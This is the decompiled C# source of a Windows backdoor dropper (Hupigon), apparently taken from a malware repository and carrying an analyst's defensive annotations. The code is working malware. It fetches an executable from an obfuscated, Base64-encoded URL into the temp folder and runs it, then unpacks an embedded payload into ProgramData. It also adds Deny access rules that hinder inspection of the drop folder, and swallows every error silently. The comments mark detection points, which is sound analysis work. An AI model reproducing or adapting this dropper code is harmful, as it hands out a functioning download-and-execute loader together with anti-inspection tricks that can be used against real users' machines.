// Decompiled with JetBrains decompiler
// Type: X
// Assembly: 12, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 02FFA771-B60F-49F4-BE51-37E50E40AF6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.Hupigon.mrzd-97a335ad9a7d65429e8d9aedeaa1dd6b93990dd399d43ca43d8ef174c0f0faee.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Collections;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Text;
// Analyst annotations added to decompiler output; the code itself is unchanged.
// This class is a dropper. main() optionally downloads and runs a remote executable, then
// unpacks an embedded resource to disk, alters the ACL of its drop directory and runs it.
// Host artefacts visible in this listing:
//   %TEMP%\jp.exe
//   %ProgramData%\DCSCRES_SERVERW\DCSCRES_SERVERW.exe
// Control flow in Lu() and BD() is goto-based and gated on MyApplication.\u002E\u002E\u002E\u002E,
// a field declared outside this file, so its value cannot be confirmed from here.
internal class X
{
  /// <summary>
  /// Entry point. Stage 1 (conditional): download a file to %TEMP%\jp.exe and start it.
  /// Stage 2 (always): decompress embedded resource "A" twice, write it under
  /// %ProgramData%\DCSCRES_SERVERW, call BD() on that directory, and start the written file.
  /// </summary>
  [STAThread]
  public static void main()
  {
    // Stage 1 runs only when the base directory is shorter than four characters (e.g. a
    // drive root) or contains "temp" in any letter case. `|` is the non-short-circuit OR,
    // so both tests are always evaluated.
    if (AppDomain.CurrentDomain.BaseDirectory.Length < 4 | Strings.InStr(AppDomain.CurrentDomain.BaseDirectory.ToLower(), "temp") > 0)
    {
      try
      {
        WebClient webClient1 = new WebClient();
        string path = Interaction.Environ("temp") + "\\jp.exe";
        WebClient webClient2 = webClient1;
        // Obfuscated download address: DEB() swaps letter case (via Lu) and then
        // Base64-decodes the result. The decoded value is not reproduced in these notes.
        string s = "Ahr0CdOVl2XVywrPBMCTys5SzwfKAg9ZDgvYlMnVBs90ywWUmJaXmdKYoteXmJe1nc5LEgu=";
        string address = X.DEB(ref s);
        // Detection point: outbound WebClient request followed by an executable written
        // to %TEMP% and launched by the same process.
        byte[] bytes = webClient2.DownloadData(address);
        System.IO.File.WriteAllBytes(path, bytes);
        Interaction.Shell(Interaction.Environ("temp") + "\\jp.exe");
      }
      catch (Exception ex)
      {
        // The exception is recorded and immediately cleared: nothing is logged or rethrown,
        // so a failed download is silent and execution continues with stage 2.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
    // Stage 2 payload: object "A" from resource set "M" of the executing assembly, passed
    // through Z() twice. This statement is outside every try block, so a missing resource
    // or malformed data here is not swallowed like the other failures.
    byte[] bytes1 = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
    string Path = Interaction.Environ("programdata") + "\\DCSCRES_SERVERW";
    string str = Path + "\\DCSCRES_SERVERW.exe";
    try
    {
      FileSystem.MkDir(Path);
    }
    catch (Exception ex)
    {
      // Directory-creation failure (for example, the directory already exists) is ignored.
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
    try
    {
      // Order matters for triage: the ACL on the directory is changed first, then the
      // payload is written and started. Detection points: DACL change on a new
      // %ProgramData% subdirectory, executable creation there, and a child process
      // launched from that path.
      X.BD(ref Path);
      System.IO.File.WriteAllBytes(str, bytes1);
      Interaction.Shell(str);
    }
    catch (Exception ex)
    {
      // Swallowed as above; a failure in any of the three steps skips the remaining ones.
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
  }

  /// <summary>
  /// Gzip-decompresses <paramref name="Byt"/> into a buffer whose size is taken from four
  /// bytes read near the end of the input.
  /// </summary>
  /// <param name="Byt">Compressed input bytes.</param>
  /// <returns>A buffer of the length read from the input, filled by one Read call.</returns>
  public static byte[] Z(byte[] Byt)
  {
    MemoryStream memoryStream = new MemoryStream(Byt);
    GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
    byte[] buffer = new byte[4];
    // Reads the output length from offset Length-5.
    // NOTE(review): a standard gzip trailer keeps its size field in the last four bytes
    // (Length-4); presumably the packed data carries one extra trailing byte - confirm
    // against the extracted resource.
    memoryStream.Position = checked (memoryStream.Length - 5L);
    memoryStream.Read(buffer, 0, 4);
    int int32 = BitConverter.ToInt32(buffer, 0);
    // Rewind so the GZipStream starts decoding from the beginning of the input.
    memoryStream.Position = 0L;
    // `int32 - 1 + 1` equals int32; the form looks like a compiler artefact of an
    // upper-bound array declaration. The length is taken from the input unvalidated.
    byte[] array = new byte[checked (int32 - 1 + 1)];
    // Single Read call; its return value (bytes actually read) is ignored.
    gzipStream.Read(array, 0, int32);
    gzipStream.Dispose();
    memoryStream.Dispose();
    return array;
  }

  /// <summary>
  /// String de-obfuscation helper: passes <paramref name="s"/> through Lu(), Base64-decodes
  /// the result and returns it as UTF-8 text. Used by main() for the download address.
  /// </summary>
  public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(X.Lu(ref s)));

  /// <summary>
  /// Builds a copy of <paramref name="text"/> in which each character found in the
  /// lowercase alphabet is upper-cased, each character equal to an upper-cased alphabet
  /// letter is lower-cased, and any other character is copied unchanged.
  /// </summary>
  /// <remarks>
  /// NOTE(review): that reading holds only when every test on
  /// MyApplication.\u002E\u002E\u002E\u002E evaluates to 0 so that each goto is taken. The
  /// field is not visible in this file; if it is non-zero the fall-through paths behave
  /// differently (the first loop test is skipped and a matched character can be appended
  /// again). Confirm the field's value before relying on this description.
  /// </remarks>
  public static string Lu(ref string text)
  {
    string str1 = "qwertyuiopasdfghjklzxcvbnm";
    string str2 = "";
    int num1 = checked (text.Length - 1);
    int index1 = 0;
    // Jump to the outer loop test; presumably always taken (see remarks).
    if ((MyApplication.\u002E\u002E\u002E\u002E & 1030) == 0)
      goto label_10;
label_1:
    // Outer loop body: scan the alphabet for the current input character.
    int num2 = checked (str1.Length - 1);
    int index2 = 0;
    if ((MyApplication.\u002E\u002E\u002E\u002E & 22) == 0)
      goto label_7;
label_2:
    char ch1 = text[index1];
    char ch2;
    // Input character is a lowercase letter from the table: emit it upper-cased.
    if ((int) ch1 == (int) str1[index2])
    {
      string str3 = str2;
      ch2 = text[index1];
      string upper = ch2.ToString().ToUpper();
      str2 = str3 + upper;
      if ((MyApplication.\u002E\u002E\u002E\u002E & 5700) == 0)
        goto label_9;
    }
    int num3 = (int) ch1;
    ch2 = str1[index2];
    int num4 = (int) Conversions.ToChar(ch2.ToString().ToUpper());
    // Input character equals the upper-cased table letter: emit it lower-cased.
    if (num3 == num4)
    {
      str2 += text[index1].ToString().ToLower();
      if ((MyApplication.\u002E\u002E\u002E\u002E & 1538) == 0)
        goto label_9;
    }
    checked { ++index2; }
label_7:
    // Alphabet exhausted without a match: copy the character unchanged.
    if (index2 > num2)
      str2 += Conversions.ToString(text[index1]);
    else
      goto label_2;
label_9:
    checked { ++index1; }
label_10:
    // Outer loop test: return once every input character has been processed.
    if (index1 > num1)
      return str2;
    goto label_1;
  }

  /// <summary>
  /// For each existing access rule on directory <paramref name="Path"/> (explicit and
  /// inherited, resolved as NTAccount), adds a Deny rule for FileSystemRights.ReadData
  /// against the account name taken from the part after the first backslash.
  /// </summary>
  /// <remarks>
  /// Defender relevance: the added Deny entries are meant to restrict reading of the drop
  /// directory for the listed accounts (ReadData shares its value with ListDirectory), which
  /// can hinder manual inspection. Unexpected Deny ACEs on a %ProgramData% subdirectory are
  /// a useful hunting signal.
  /// </remarks>
  public static void BD(ref string Path)
  {
    DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
    IEnumerator enumerator;
    try
    {
      enumerator = accessControl1.GetAccessRules(true, true, typeof (NTAccount)).GetEnumerator();
      // Jump to the MoveNext() test; presumably always taken. NOTE(review): depends on a
      // field declared outside this file - confirm.
      if ((MyApplication.\u002E\u002E\u002E\u002E & 4624) == 0)
        goto label_5;
label_2:
      FileSystemAccessRule current = (FileSystemAccessRule) enumerator.Current;
      try
      {
        // The security descriptor is re-read and re-applied once per rule.
        DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
        // Index [1] assumes a DOMAIN\name identity; an identity without a backslash makes
        // this statement throw, and the inner catch skips that rule.
        FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(current.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
        accessControl2.AddAccessRule(rule);
        Directory.SetAccessControl(Path, accessControl2);
      }
      catch (Exception ex)
      {
        // Per-rule failures are swallowed so the remaining rules are still processed.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
label_5:
      if (enumerator.MoveNext())
        goto label_2;
    }
    finally
    {
      // Compiler-generated disposal of the enumerator (foreach lowering).
      if (enumerator is IDisposable)
        (enumerator as IDisposable).Dispose();
    }
  }
}